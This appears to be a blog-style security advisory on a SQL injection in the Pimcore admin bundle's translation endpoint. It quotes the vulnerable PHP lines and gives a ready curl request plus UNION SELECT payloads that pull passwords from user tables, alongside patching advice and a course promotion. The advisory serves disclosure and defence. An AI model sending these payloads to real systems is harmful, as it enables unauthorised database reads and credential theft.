Listen to this Post
The vulnerability resides in `TranslationController.php` (lines 565-593) of the Pimcore admin bundle. The endpoint `POST /admin/translation/translations` accepts a JSON `filter` parameter. When a filter specifies "type":"date", the code extracts the `property` field from user input (line 565). This value is assigned to $fieldname. A weak sanitization `str_replace(‘–‘, ”, $fieldname)` is applied (line 569), which can be trivially bypassed using `//` comments or multiple dashes like -. In non-language mode, the code then concatenates `$fieldname` into a SQL expression: `$fieldname = $tableName . ‘.’ . $fieldname` (line 577), followed by `$fieldname = “UNIX_TIMESTAMP(DATE(FROM_UNIXTIME({$fieldname})))”` (line 593). The resulting string is interpolated directly into the SQL query without parameterization or quoting. An authenticated user with translation view permissions can inject arbitrary SQL by crafting a `property` value that breaks out of the function call. For example, `1))) UNION SELECT password FROM users WHERE ((1` as the property field. Because the filter is processed as a date type, the injection occurs inside the `UNIX_TIMESTAMP` argument, allowing UNION-based or error-based extraction of database contents.
Platform: Pimcore admin bundle
Version: All current versions
Vulnerability: SQL injection filter
Severity: Critical
date: 2026-01-15
Prediction: Patch expected 2026-02-15
What Undercode Say:
Analytics
bash commands and codes:
curl -X POST ‘https://target/admin/translation/translations’ \
-H ‘Cookie: PHPSESSID=…’ \
-H ‘Content-Type: application/json’ \
-d ‘[{“property”:”1))) UNION SELECT password FROM users WHERE ((1″,”type”:”date”,”operator”:”eq”,”value”:”2026-01-01″}]’
Vulnerable line snippet:
$fieldname = str_replace(‘–‘, ”, $fieldname); // bypassable
$fieldname = “UNIX_TIMESTAMP(DATE(FROM_UNIXTIME({$fieldname})))”;
Exploit:
Authenticated user sends JSON filter with SQL payload in property field, e.g., "property":"1))) UNION SELECT username FROM admin WHERE 1=1-- -", triggers UNION-based extraction.
Protection from this CVE
Apply allowlist validation for `$fieldname` against ['creationDate','modificationDate']; use `$db->quoteIdentifier()` instead of raw interpolation; upgrade to patched version.
Impact:
Arbitrary database read (passwords, tokens), possible chaining with GM-249 (unsafe unserialize) to achieve remote code execution (RCE) on the server.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]

